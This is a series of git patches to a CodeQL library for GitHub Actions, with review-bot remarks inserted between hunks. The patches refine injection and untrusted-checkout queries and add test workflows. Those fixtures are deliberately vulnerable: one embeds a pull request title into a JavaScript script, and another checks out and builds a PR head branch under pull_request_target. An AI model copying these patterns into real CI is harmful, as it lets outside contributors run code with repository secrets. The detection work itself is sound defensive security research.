utput}} | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | cfgNodes | .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | | .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | 
@@ -312,26 +210,20 @@ cfgNodes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:14:15:46 | > | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/test.yml:1:1:40:53 | enter on: push | 
@@ -346,14 +238,11 @@ cfgNodes | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | dfNodes | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | 
@@ -385,36 +274,6 @@ dfNodes | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -exprNodes -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: 
simplesink1 |
-| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files |
-| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 |
-| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref |
-| .github/workflows/test.yml:39:9:40:53 | Run Step: sink |
-| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output |
 argumentNodes
 | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files |
 usesIds
diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql
index bf52da395fef..8cf97d58ab03 100644
--- a/ql/test/library-tests/test.ql
+++ b/ql/test/library-tests/test.ql
@@ -1,4 +1,3 @@
-import codeql.actions.ast.internal.Yaml
 import codeql.actions.Ast
 import codeql.actions.Cfg as Cfg
 import codeql.actions.DataFlow
@@ -7,28 +6,32 @@ import codeql.actions.dataflow.ExternalFlow
 query predicate files(File f) { any() }
-query predicate yamlNodes(YamlNode n) { any() }
+query predicate workflows(Workflow w) { any() }
-query predicate jobNodes(Job s) { any() }
+query predicate reusableWorkflows(ReusableWorkflow w) { any() }
-query predicate stepNodes(Step s) { any() }
+query predicate compositeActions(CompositeAction w) { any() }
-query predicate runNodes(Run s) { any() }
+query predicate jobs(Job s) { any() }
-query predicate runExprNodes(Run s, ExpressionNode e) { e = s.getScript().getAnExpression() }
+query predicate localJobs(LocalJob s) { any() }
-query predicate allUsesNodes(Uses s) { any() }
+query predicate extJobs(ExternalJob s) { any() }
-query predicate stepUsesNodes(UsesStep s) { any() }
+query predicate steps(Step s) { any() }
-query predicate jobUsesNodes(UsesStep s) { any() }
+query predicate runSteps(Run run, string body) { run.getScript() = body }
-query predicate usesSteps(Uses call, string argname, AstNode arg) {
+query predicate runExprs(Run s, Expression e) { e = s.getAnScriptExpr() }
+
+query predicate uses(Uses s) { any() }
+
+query predicate stepUses(UsesStep s) { any() }
+
+query predicate usesArgs(Uses call, string argname, Expression arg) {
 call.getArgumentExpr(argname) = arg
 }
-query predicate runSteps(Run run, string body) { run.getScript().getValue() = body }
-
 query predicate runStepChildren(Run run, AstNode child) { child.getParentNode() = run }
 query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent }
@@ -37,8 +40,6 @@ query predicate cfgNodes(Cfg::Node n) { any() }
 query predicate dfNodes(DataFlow::Node e) { any() }
-query predicate exprNodes(DataFlow::Node e) { any() }
-
 query predicate argumentNodes(DataFlow::ArgumentNode e) { any() }
 query predicate usesIds(UsesStep s, string a) { s.getId() = a }
From 0b71d0240743a84888b6bb3fffa47feb51f8d2ec Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 13 Mar 2024 13:49:50 +0100 Subject: [PATCH 090/707] fix: clean debug lefovers --- ql/lib/codeql/actions/Ast.qll | 1 - ql/lib/codeql/actions/ast/internal/Ast.qll | 34 ------ .../codeql/actions/dataflow/FlowSources.qll | 1 + .../dataflow/internal/DataFlowPrivate.qll | 2 - .../CWE-094/CriticalExpressionInjection.ql | 12 +-- .../CWE-094/.github/workflows/changelog.yml | 100 ++++++++++++++++++ .../.github/workflows/changelog_required.yml | 9 ++ 7 files changed, 116 insertions(+), 43 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll
index 2bfedd623f5c..3123518d3690 100644
--- a/ql/lib/codeql/actions/Ast.qll
+++ b/ql/lib/codeql/actions/Ast.qll
@@ -121,7 +121,6 @@ class Outputs extends AstNode instanceof OutputsImpl {
 Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) }
- // TODO: REMOVE
 override string toString() { result = "Job outputs node" }
 }
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll
index 63b25229a588..028f22806807 100644
--- a/ql/lib/codeql/actions/ast/internal/Ast.qll
+++ b/ql/lib/codeql/actions/ast/internal/Ast.qll
@@ -252,11 +252,6 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction {
 override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
- // override AstNodeImpl getAChildNode() {
- // result = this.getInputs() or
- // result = this.getOutputs() or
- // result = this.getRuns()
- // }
 override AstNodeImpl getParentNode() { none() }
 override string getAPrimaryQlClass() { result = "CompositeActionImpl" }
@@ -292,12 +287,6 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode {
 override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
- // override AstNodeImpl getAChildNode() {
- // result = this.getAJob() or
- // result = this.getStrategy() or
- // result = this.getEnv() or
- // result = this.getPermissions()
- // }
 override AstNodeImpl getParentNode() { none() }
 override string getAPrimaryQlClass() { result = "WorkflowImpl" }
@@ -306,8 +295,6 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode {
 override YamlMapping getNode() { result = n }
- // /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */
- // YamlMapping getJobs() { result = this.asYamlMapping().lookup("jobs") }
 /** Gets the 'global' `env` mapping in this workflow. */
 EnvImpl getEnv() { result.getNode() = n.lookup("env") }
@@ -346,11 +333,6 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl {
 override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
- // override AstNodeImpl getAChildNode() {
- // result = super.getAChildNode() or
- // result = this.getInputs() or
- // result = this.getOutputs()
- // }
 OutputsImpl getOutputs() { result.getNode() = workflow_call.(YamlMapping).lookup("outputs") }
 ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() }
@@ -378,7 +360,6 @@ class RunsImpl extends AstNodeImpl, TRunsNode {
 override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
- //override AstNodeImpl getAChildNode() { result = this.getAStep() }
 override CompositeActionImpl getParentNode() { result.getAChildNode() = this }
 override string getAPrimaryQlClass() { result = "RunsImpl" }
@@ -450,7 +431,6 @@ class OutputsImpl extends AstNodeImpl, TOutputsNode {
 override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
- //override AstNodeImpl getAChildNode() { result = this.getAnOutputExpr() }
 override AstNodeImpl getParentNode() { result.getAChildNode() = this }
 override string getAPrimaryQlClass() { result = "OutputsImpl" }
@@ -503,7 +483,6 @@ class StrategyImpl extends AstNodeImpl, TStrategyNode {
 override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
- //override ExpressionImpl getAChildNode() { result = this.getAMatrixVarExpr() }
 override AstNodeImpl getParentNode() { result.getAChildNode() = this }
 override string getAPrimaryQlClass() { result = "StrategyImpl" }
@@ -557,10 +536,8 @@ class JobImpl extends AstNodeImpl, TJobNode {
 workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n
 }
- // TODO: REMOVE
 override string toString() { result = "Job: " + jobId }
- //override string toString() { result = n.toString() }
 override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
 override WorkflowImpl getParentNode() { result.getAChildNode() = this }
@@ -739,7 +716,6 @@ class UsesStepImpl extends StepImpl, UsesImpl {
 result.getParentNode().getNode() = n.lookup("with").(YamlMapping).lookup(key)
 }
- // TODO: REMOVE
 override string toString() {
 if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step"
 }
@@ -760,7 +736,6 @@ class ExternalJobImpl extends JobImpl, UsesImpl {
 ExternalJobImpl() { n.lookup("uses") = u }
- //override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
 override string getCallee() {
 if u.getValue().matches("./%")
 then result = u.getValue().regexpCapture(pathUsesParser(), 1)
@@ -796,7 +771,6 @@ class RunImpl extends StepImpl {
 ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script }
- // TODO: REMOVE
 override string toString() {
 if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step"
 }
@@ -807,14 +781,6 @@ class RunImpl extends StepImpl {
 * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability
 */
 abstract class ContextExpressionImpl extends ExpressionImpl {
- // TODO: REMOVE
- // ContextExpressionImpl() {
- // expression
- // .regexpMatch([
- // stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(),
- // matrixCtxRegex()
- // ])
- // }
 abstract string getFieldName();
 abstract AstNodeImpl getTarget();
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll
index 32d37efdaaea..23ae225e07ed 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll
@@ -96,6 +96,7 @@ private predicate isExternalUserControlledWorkflowRun(string context) {
 exists(string reg |
 reg =
 [
+ "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow\\s*\\.\\s*path\\b",
 "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_branch\\b",
 "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*display_title\\b",
 "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_repository\\b\\s*\\.\\s*description\\b",
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
index 52c2ae6a4833..bda55da5c82a 100644
--- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
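Review bot: The new `github.event.workflow.path` entry in `isExternalUserControlledWorkflowRun` is added without a comment saying which `workflow_run` scenario makes that field attacker-influenced, and this commit's diffstat adds no test that exercises it. The neighbouring entries are `workflow_run` head-branch/title/repository fields whose untrusted origin is self-evident, whereas `workflow.path` reads as the path of the workflow definition itself, so a reader cannot tell whether this is a deliberate source or a leftover from the debugging the commit title refers to. A one-line comment naming the threat scenario, e.g. `// <constructed placeholder: why a fork can influence github.event.workflow.path>`, or a fixture in the CWE-094 tests, would settle it. The `reg = [...]` list and the rest of the predicate continue outside the hunk.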
@@ -72,7 +72,6 @@ class DataFlowCall instanceof Cfg::Node {
 /** Gets a textual representation of this element. */
 string toString() { result = super.toString() }
- //Location getLocation() { result = super.getLocation() }
 string getName() { result = super.getAstNode().(Uses).getCallee() }
 DataFlowCallable getEnclosingCallable() { result = super.getScope() }
@@ -84,7 +83,6 @@ class DataFlowCall instanceof Cfg::Node {
 class DataFlowCallable instanceof Cfg::CfgScope {
 string toString() { result = super.toString() }
- //Location getLocation() { result = super.getLocation() }
 string getName() {
 if this instanceof ReusableWorkflow
 then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath()
diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql
index fd4f03e1edd8..66a055634c7e 100644
--- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql
+++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql
@@ -34,14 +34,14 @@ module MyFlow = TaintTracking::Global;
 import MyFlow::PathGraph
-from MyFlow::PathNode source, MyFlow::PathNode sink
+from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w
 where
 MyFlow::flowPath(source, sink) and
- source
- .getNode()
- .asExpr()
- .getEnclosingWorkflow()
- .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
+ w = source.getNode().asExpr().getEnclosingWorkflow() and
+ (
+ w instanceof ReusableWorkflow or
+ w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
+ )
 select sink.getNode(), source, sink,
 "Potential expression injection in $@, which may be controlled by an external user.", sink,
 sink.getNode().asExpr().(Expression).getExpression()
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml
new file mode 100644
index 000000000000..0ee850f183d7
--- /dev/null
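Review bot: The new `w instanceof ReusableWorkflow or …` disjunction drops the trigger-event filter for every source inside a reusable workflow, and nothing in the hunk records why, so the next reader is likely to take it for a mistake and "tighten" it back. A comment above the parenthesised condition would settle it, e.g. `// A reusable workflow runs under its caller's trigger, which is not visible here, so any trigger-specific source is treated as reachable.` That reasoning is sound for a query that prefers false positives over misses, but it is worth saying so explicitly since `CriticalExpressionInjection` is the high-precision variant.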
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml 
@@ -0,0 +1,100 @@ +name: changelog + +on: + workflow_call: + inputs: + create: + description: Add a log to the changelog + type: boolean + required: false + default: false + update: + description: Update the existing changelog + type: boolean + required: false + default: false + +jobs: + changelog: + runs-on: ubuntu-latest + env: + file: CHANGELOG.md + steps: + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + - name: Check ${{ env.file }} + run: | + if [[ $(git diff --name-only origin/master HEAD -- ${{ env.file }} | grep '^${{ env.file }}$' -c) -eq 0 ]]; then + echo "Expected '${{ env.file }}' to be modified" + exit 1 + fi + update: + runs-on: ubuntu-latest + needs: changelog + if: (inputs.create && failure()) || (inputs.update && success()) + continue-on-error: true + env: + file: CHANGELOG.md + next_version: next + link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Update ${{ env.file }} from PR title + id: update + uses: actions/github-script@v6 + env: + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + with: + result-encoding: string + script: | + const fs = require('fs'); + const file = './${{ env.file }}'; + let content = fs.readFileSync(file).toString(); + const title = '[${{ env.next_version }}]'; + const log = '${{ env.log }}'; + let exists = ${{ needs.changelog.result == 'success' }}; + + if (!content.includes(title)) { + const insertAt = content.indexOf('\n') + 1; + content = + content.slice(0, insertAt) + + `\n## ${title}\n\n\n` + + content.slice(insertAt); + } + + const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; + if (exists && ${{ github.event.action == 'edited' }}) { + const prevLog = '${{ env.prev_log }}'; + const index = content.indexOf(prevLog, 
insertAt); + if (index > -1) { + content = content.slice(0, index) + content.slice(index + prevLog.length); + exists = false; + } + } + + if (!exists) { + content = content.slice(0, insertAt) + log + content.slice(insertAt); + fs.writeFileSync(file, content); + return true; + } + + return false;
+ - name: Setup node
+ if: fromJson(steps.update.outputs.result)
+ uses: actions/setup-node@v3
+ with:
+ node-version: 18.x
+ - name: Commit & Push
+ if: fromJson(steps.update.outputs.result)
+ run: |
+ npm ci
+ npx prettier --write ${{ env.file }}
+ git config user.name github-actions[bot]
+ git config user.email github-actions[bot]@users.noreply.github.com
+ git add ${{ env.file }}
+ git commit -m "update ${{ env.file }}"
+ git push
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml
new file mode 100644
index 000000000000..b0a1ea5ed685
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml
@@ -0,0 +1,9 @@
+name: '📋'
+
+on:
+ pull_request:
+ branches: [master]
+
+jobs:
+ changelog:
+ uses: ./.github/workflows/changelog.yml
From 1bf2431c992f2c45ba9d23b7c970fb271083ab34 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 13 Mar 2024 15:41:57 +0100 Subject: [PATCH 091/707] Improve UntrustedCheckout query Account for more events, more triggers and heuristics to detect git checkouts --- ql/src/Security/CWE-829/UntrustedCheckout.ql | 85 +++++++++++++------ .../CWE-829/.github/workflows/gitcheckout.yml | 23 +++++ 2 files changed, 80 insertions(+), 28 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml
diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql
index 865169b3cd94..0b3a2873d516 100644
--- a/ql/src/Security/CWE-829/UntrustedCheckout.ql
+++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql
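Review bot: The fixture embeds `${{ github.event.pull_request.title }}` into `env.log` and from there into a JavaScript string literal in the `github-script` step (`const log = '${{ env.log }}';`), which is exactly the pattern the query is meant to report under a `workflow_call` trigger, yet this commit's diffstat lists no `.expected` change for CWE-094, so nothing asserts that the `ReusableWorkflow` branch added to the query actually fires on it. If the expected output is intentionally deferred, a line in the commit message saying so would help; otherwise the `CriticalExpressionInjection.expected` update belongs in the same commit as the fixture. The hunk starts at `@@ -0,0 +1,100 @@` on the previous line.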
@@ -15,39 +15,68 @@ import actions
-/**
- * An If node that contains an `actor` check
- */
-class ActorCheck extends If {
- ActorCheck() {
+/** An If node that contains an actor, user or label check */
+class ControlCheck extends If {
+ ControlCheck() {
 this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") or
- this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.user\\.login.*")
+ this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.user\\.login.*") or
+ this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") or
+ this.getCondition().regexpMatch(".*github\\.event\\.label\\.name.*")
 }
 }
-/**
- * An If node that contains a `label` check
- */
-class LabelCheck extends If {
- LabelCheck() {
- this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") or
- this.getCondition().regexpMatch(".*github\\.event\\.label\\.name.*")
+bindingset[s]
+predicate containsHeadRef(string s) {
+ s.matches("%" +
+ [
+ "github.event.number", // The pull request number.
+ "github.event.pull_request.head.ref", // The ref name of head.
+ "github.event.pull_request.head.sha", // The commit SHA of head.
+ "github.event.pull_request.id", // The pull request ID.
+ "github.event.pull_request.number", // The pull request number.
+ "github.event.pull_request.merge_commit_sha", // The SHA of the merge commit.
+ "github.head_ref", // The head_ref or source branch of the pull request in a workflow run.
+ "github.event.workflow_run.head_branch", // The branch of the head commit.
+ "github.event.workflow_run.head_commit.id", // The SHA of the head commit.
+ "github.event.workflow_run.head_sha", // The SHA of the head commit.
+ "env.GITHUB_HEAD_REF",
+ ] + "%")
+}
+
+/** Checkout of a Pull Request HEAD ref */
+abstract class PRHeadCheckoutStep extends Step { }
+
+/** Checkout of a Pull Request HEAD ref using actions/checkout action */
+class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep {
+ ActionsCheckout() {
+ this.getCallee() = "actions/checkout" and
+ containsHeadRef(this.getArgumentExpr("ref").getExpression())
+ }
+}
+
+/** Checkout of a Pull Request HEAD ref using git within a Run step */
+class GitCheckout extends PRHeadCheckoutStep instanceof Run {
+ GitCheckout() {
+ exists(string line |
+ this.getScript().splitAt("\n") = line and
+ line.regexpMatch(".*git\\s+fetch.*") and
+ (
+ containsHeadRef(line)
+ or
+ exists(string varname |
+ containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) and
+ line.matches("%" + varname + "%")
+ )
+ )
+ )
 }
 }
-from Workflow w, LocalJob job, UsesStep checkoutStep
+from Workflow w, PRHeadCheckoutStep checkout
 where
- w.hasTriggerEvent("pull_request_target") and
- w.getAJob() = job and
- job.getAStep() = checkoutStep and
- checkoutStep.getCallee() = "actions/checkout" and
- checkoutStep
- .getArgumentExpr("ref")
- .getExpression()
- .matches([
- "%github.event.pull_request.head.ref%", "%github.event.pull_request.head.sha%",
- "%github.event.pull_request.number%", "%github.event.number%", "%github.head_ref%"
- ]) and
- not exists(ActorCheck check | job.getIf() = check or checkoutStep.getIf() = check) and
- not exists(LabelCheck check | job.getIf() = check or checkoutStep.getIf() = check)
-select checkoutStep, "Potential unsafe checkout of untrusted pull request on 'pull_request_target'."
+ w.hasTriggerEvent(["pull_request_target", "issue_comment", "workflow_run"]) and
+ w.getAJob().(LocalJob).getAStep() = checkout and
+ not exists(ControlCheck check |
+ checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check
+ )
+select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow."
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml
new file mode 100644
index 000000000000..ab121239c6e1
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml
@@ -0,0 +1,23 @@
+on:
+ pull_request_target
+
+jobs:
+ build:
+ name: Build and test
+ runs-on: ubuntu-latest
+ steps:
+ # 1. Check out the content from an incoming pull request
+ - run: |
+ git fetch origin $HEAD_BRANCH
+ git checkout origin/master
+ git config user.name "release-hash-check"
+ git config user.email "<>"
+ git merge --no-commit --no-edit origin/$HEAD_BRANCH
+ env:
+ HEAD_BRANCH: ${{ github.head_ref }}
+ - uses: actions/setup-node@v1
+ # 2. Potentially untrusted commands are being run during "npm install" or "npm build" as
+ # the build scripts and referenced packages are controlled by the author of the pull request
+ - run: |
+ npm install
+ npm build
From 839d16cde563efe235bca401d6959e97a1bdaf47 Mon Sep 17 00:00:00 2001
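Review bot: In `GitCheckout`, `line.matches("%" + varname + "%")` treats the env var name as a bare substring, so a short name such as `REF` or `SHA` matches any script line containing those letters, and the line is not required to actually reference the variable as `$NAME` or `${NAME}`; a shell-reference pattern such as `line.regexpMatch(".*\\$\\{?\\Q" + varname + "\\E\\b.*")` keeps the fixture case (`git fetch origin $HEAD_BRANCH`) while dropping those accidental hits, and the `\\Q…\\E` quoting matters because `varname` comes from the analysed YAML and could contain regex metacharacters. The heuristic also inspects only `git fetch` lines, so a Run step that does `git checkout` or `git pull` on a head ref without a separate fetch is not reported; if that is a deliberate first cut, a comment on the `regexpMatch(".*git\\s+fetch.*")` line saying so would stop it being read as an oversight. `getInScopeEnvVarExpr` is defined outside this file, so whether it already restricts `varname` is not visible here.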
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 13 Mar 2024 18:41:17 +0100 Subject: [PATCH 092/707] Treat If's values as expression no matter the delimiters --- ql/lib/codeql/actions/Ast.qll | 12 ++ ql/lib/codeql/actions/ast/internal/Ast.qll | 20 ++- ql/src/Security/CWE-829/UntrustedCheckout.ql | 39 ++--- ql/test/library-tests/test.expected | 7 +- ql/test/library-tests/test.ql | 10 ++ .../CriticalExpressionInjection.expected | 4 + .../CWE-094/ExpressionInjection.expected | 4 + .../CWE-829/.github/workflows/auto_ci.yml | 135 ++++++++++++++++++ .../CWE-829/UnpinnedActionsTag.expected | 3 + .../CWE-829/UntrustedCheckout.expected | 5 +- 10 files changed, 215 insertions(+), 24 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll
index 3123518d3690..271182a05dd2 100644
--- a/ql/lib/codeql/actions/Ast.qll
+++ b/ql/lib/codeql/actions/Ast.qll
@@ -1,6 +1,16 @@
 private import codeql.actions.ast.internal.Ast
 private import codeql.Locations
+module Utils {
+ bindingset[expr]
+ string normalizeExpr(string expr) {
+ result =
+ expr.regexpReplaceAll("[\\.\\'\\[\\]\"]+", ".")
+ .regexpReplaceAll("\\.$", "")
+ .regexpReplaceAll("\\.\\s", " ")
+ }
+}
+
 class AstNode instanceof AstNodeImpl {
 AstNode getAChildNode() { result = super.getAChildNode() }
@@ -188,6 +198,8 @@ class Step extends AstNode instanceof StepImpl {
 */
 class If extends AstNode instanceof IfImpl {
 string getCondition() { result = super.getCondition() }
+
+ Expression getConditionExpr() { result = super.getConditionExpr() }
 }
 abstract class Uses extends AstNode instanceof UsesImpl {
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll
index 028f22806807..14f3cd2ecd9c 100644
--- a/ql/lib/codeql/actions/ast/internal/Ast.qll
+++ b/ql/lib/codeql/actions/ast/internal/Ast.qll
